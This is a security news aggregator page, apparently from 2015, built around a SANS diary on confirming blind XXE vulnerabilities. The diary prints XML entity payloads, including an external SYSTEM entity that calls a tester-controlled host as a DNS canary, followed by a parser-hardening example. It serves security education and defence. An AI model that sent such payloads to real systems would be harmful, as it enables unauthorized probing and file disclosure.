Hackin9
(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
 
FerretCMS Multiple Security Vulnerabilities
 

British Infosec startup, Cyberlytic wins first Firestarter Trailblazer Award ...
WhaTech
Europe dominates the Firestarter's category in Tech Trailblazers with three UK and one French startups recognized alongside Singaporean Firestarter London, UK - January 29th 2015 - The highly successful Tech Trailblazers Awards today announced the ...

 

This morning, a number of developers signed in to Apple's iTunes Connect service only to be greeted by a list of apps that didn't belong to them. TechCrunch has a good roundup of tweets from affected developers—it seems that whenever developers signed in with their credentials, they were being granted access to other developers' accounts at random.

As of about noon Eastern today, Apple took the service down to resolve the problem. It also looks like developers won't be able to submit new apps or invite new testers to TestFlight while iTunes Connect is down. Affected developers can check Apple's System Status page for developers for updates while they wait for the problems to be resolved (no other developer services appear to be affected by the outage).

We don't yet know whether the outage was caused by some error on Apple's end or by a security breach like the one that brought all developer systems down in the summer of 2013. We've asked Apple when the service will be back and what caused the login problem in the first place, and we'll update this article as we have new details.


 

British Infosec startup, Cyberlytic wins first Firestarter Trailblazer Award ...
RealWire (press release)
The Firestarter programme has been created to ensure dedicated recognition and reward for the new lean startups who are still securing major funding from VCs. This new award has attracted a large number of earlier stage startups from within the ...

 

Almost exactly a year ago I posted a diary called Is XXE the new SQLi?; you can read it at https://isc.sans.edu/diary/Is+XXE+the+new+SQLi/17375. In the last year, things have not changed a lot regarding XXE vulnerabilities. They still seem to be popping up here and there, depending on how XML documents are consumed by server side applications.

Recently I had an interesting engagement where the server side web application consumed an XML document submitted by a user (through a web browser, in a POST HTTP request). Of course, whenever you see XML being used, you should always test for the existence of XXE vulnerabilities, since their impact can be quite serious (check the original diary): they can lead to anything from Denial of Service attacks to disclosure of arbitrary files.

In this specific case, however, the problem was that while the application processed the submitted XML document, it never output anything from the document: the application would only echo back whether processing was successful or not.

So the question that came to mind was how to confirm whether the target application was vulnerable to XXE or not. Sure, I could try to launch a DoS attack to see if it works, but since I was dealing with a semi-production system, this was not an option.

Almost like blind SQL injection

This case is very similar to blind SQL injection vulnerabilities: we can modify the input and, while we cannot see the output directly, we can deduce what happened on the server side. Let's look at the XML document the application expects:

<DocumentLayer>
<Document InternalID="1">
<DocumentPointer>Test</DocumentPointer>
</Document>
</DocumentLayer>

Of course, in the real test the XML document was much more complex and had some logic for the backend application. Since the DocumentPointer element must contain the text Test for processing to succeed, we can declare an internal entity with that value and reference it from the element:

<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe "Test">
]>
<DocumentLayer>
<Document InternalID="1">
<DocumentPointer>&xxe;</DocumentPointer>
</Document>
</DocumentLayer>

Simple! If this works, it means that we have blindly confirmed that the XML processor on the server side resolved our reference to the xxe entity. Cool.

The next step is to see if we can use external entities. However, again, since we cannot see the results of the XXE injection, it's not all that simple. To make things more complex, the backend server is behind a firewall that does not let the machine connect directly to anything on the Internet. This stops us from using a SYSTEM external entity with a supplied URL.

So is there any other way to confirm that external entities are supported? Probably yes: there is one protocol that is almost always allowed, in one sense or another: DNS. In this particular case, this means that we can craft an external entity that points to a host in a domain we control; by checking the DNS requests that reach our name servers we can see whether the entity was resolved or not. In this case it does not matter whether the backend server can access the Internet or not:

<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe SYSTEM "http://thisdomaindoesnotexist.infigo.hr/test.txt">
]>
<DocumentLayer>
<Document InternalID="1">
<DocumentPointer>&xxe;</DocumentPointer>
</Document>
</DocumentLayer>

While this document will not be processed correctly (remember, the DocumentPointer element must contain the text string Test), the reference will still be resolved by the XML processor, and by observing the DNS traffic on the name servers for our domain we will see a request for the submitted host name, which allows us to confirm that external entities are resolved by the target application.

So, to wrap things up, we blindly confirmed the XXE vulnerability in the target application. While in this case our exploitation options are unfortunately limited to DoS, it is worth noting that the vulnerability exists and that it's only a matter of time before it is abused further, unless patched.
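As an added example (not code from the diary or from the tested application), the following Python snippet shows the server-side view of both probes above: a legacy parser that honours the DTD expands the internal xxe entity to Test and goes on to resolve the SYSTEM entity (the moment at which the DNS canary fires), while a hardened parser rejects any DOCTYPE before an entity can be declared, so no lookup ever happens. The application logic (success only when DocumentPointer contains Test) and the canary URL are assumptions.

```python
import xml.parsers.expat as expat

def parse_document_pointer(xml_text, allow_dtd):
    # Assumed application logic (not from the diary): success only when
    # DocumentPointer holds exactly "Test". allow_dtd=False rejects any DOCTYPE
    # before an entity can be declared, so no external lookup is attempted.
    result = {"ok": False, "pointer": "", "external_refs": []}
    chars, in_pointer = [], [False]
    p = expat.ParserCreate()

    def start_doctype(name, sysid, pubid, has_internal_subset):
        if not allow_dtd:
            raise ValueError("DOCTYPE not permitted in submitted documents")

    def external_ref(context, base, system_id, public_id):
        # A real resolver would look up the host name and fetch the URL here;
        # that lookup is the blind DNS canary. This example only records it.
        result["external_refs"].append(system_id)
        return 1  # report success but supply no content for the entity

    def start_element(name, attrs):
        in_pointer[0] = name == "DocumentPointer"

    def end_element(name):
        in_pointer[0] = False

    def char_data(data):
        if in_pointer[0]:
            chars.append(data)

    p.StartDoctypeDeclHandler = start_doctype
    p.ExternalEntityRefHandler = external_ref
    p.StartElementHandler = start_element
    p.EndElementHandler = end_element
    p.CharacterDataHandler = char_data
    p.Parse(xml_text, True)  # internal entities such as &xxe; expand here
    result["pointer"] = "".join(chars)
    result["ok"] = result["pointer"] == "Test"
    return result

# Constructed probes mirroring the diary's two test documents; the canary URL is made up.
INTERNAL_PROBE = """<!DOCTYPE DocumentLayer [
<!ELEMENT DocumentLayer ANY>
<!ENTITY xxe "Test">
]>
<DocumentLayer><Document InternalID="1">
<DocumentPointer>&xxe;</DocumentPointer></Document></DocumentLayer>"""
EXTERNAL_PROBE = INTERNAL_PROBE.replace(
    '<!ENTITY xxe "Test">',
    '<!ENTITY xxe SYSTEM "http://canary.example.invalid/test.txt">')
```

With allow_dtd=True the internal probe reports success and the external probe fails but leaves the canary URL in external_refs, exactly the two signals the diary relies on; with allow_dtd=False both probes are rejected outright.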

--
Bojan
@bojanz
INFIGO IS

 
Unauthenticated Reflected XSS vulnerability in Asus RT-N10 Plus router
 
Reflected XSS vulnerability in Asus RT-N10 Plus Router
 
ESA-2015-002: Unisphere Central Security Update for Multiple Vulnerabilities
 

 

 
Blubrry PowerPress Security Advisory - XSS Vulnerability - CVE-2015-1385
 
LinuxSecurity.com: Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 4 Extended Life Cycle Support. Red Hat Product Security has rated this update as having Critical security [More...]
 
LinuxSecurity.com: Updated glibc packages that fix one security issue are now available for Red Hat Enterprise Linux 5.6 Long Life, Red Hat Enterprise Linux 5.9 Extended Update Support, Red Hat Enterprise Linux 6.2 Advanced Update Support, and Red Hat Enterprise Linux 6.4 and 6.5 Extended Update Support. [More...]
 

A Dutch judge has ruled (Google Translate) that an accused Russian “sophisticated hacker” can be extradited to the United States.

The Hague District Court Judge M.E. Groeneveld Stubbe ordered (Google Translate) Tuesday that Vladimir Drinkman first be sent to the US before the Netherlands should even consider a second extradition request made by his home country.

Why? Besides the fact that the US asked first, Russian law forbids extraditing its own citizens, so there is little chance Drinkman would be sent on to face charges in the US. However, Drinkman could conceivably be deported back to Russia, if convicted, once his prison time is complete.


 
LinuxSecurity.com: New glibc packages are available for Slackware 13.0, 13.1, 13.37, 14.0, and 14.1 to fix a security issue. [More Info...]
 
LinuxSecurity.com: Updated ntp packages that fix several security issues are now available for Red Hat Enterprise Linux 6.5 Extended Update Support. Red Hat Product Security has rated this update as having Important security [More...]
 
LinuxSecurity.com: Updated kernel packages that fix multiple security issues and several bugs are now available for Red Hat Enterprise Linux 7. Red Hat Product Security has rated this update as having Important security [More...]
 
LinuxSecurity.com: Security Report Summary
 
LinuxSecurity.com: Updated libyaml packages that fix one security issue are now available for Red Hat Enterprise Linux 6 and 7. Red Hat Product Security has rated this update as having Moderate security [More...]
 
Drupal Context Module Open Redirection Vulnerability
 
CVE-2014-8779: SSH Host keys on Pexip Infinity
 
AST-2015-001: File descriptor leak when incompatible codecs are offered
 
Cisco Security Advisory: GNU glibc gethostbyname Function Buffer Overflow Vulnerability
 
[slackware-security] glibc (SSA:2015-028-01)
 
KL-001-2015-001 : Windows 2003 tcpip.sys Privilege Escalation
 
Airwatch CVE-2014-8372 Multiple Information Disclosure Vulnerabilities
 
Apple iOS APPLE-SA-2015-01-27-2 Multiple Security Vulnerabilities
 
Multiple Apple Products Multiple Security Vulnerabilities
 

InfoSec heavies weigh in on what the 9th Data Privacy Day taught us
ITProPortal
Today marks the ninth annual Data Privacy Day; the purpose of which is to raise public awareness and advocate data protection and privacy best practices. Over the last year we've seen many high profile breaches, which involved eBay, JPMorgan, and most ...

 
Linux Kernel 'SMB2_tcon' NULL Pointer Dereference Denial of Service Vulnerability
 
GNU glibc CVE-2015-0235 Remote Heap Buffer Overflow Vulnerability
 
Internet Storm Center Infocon Status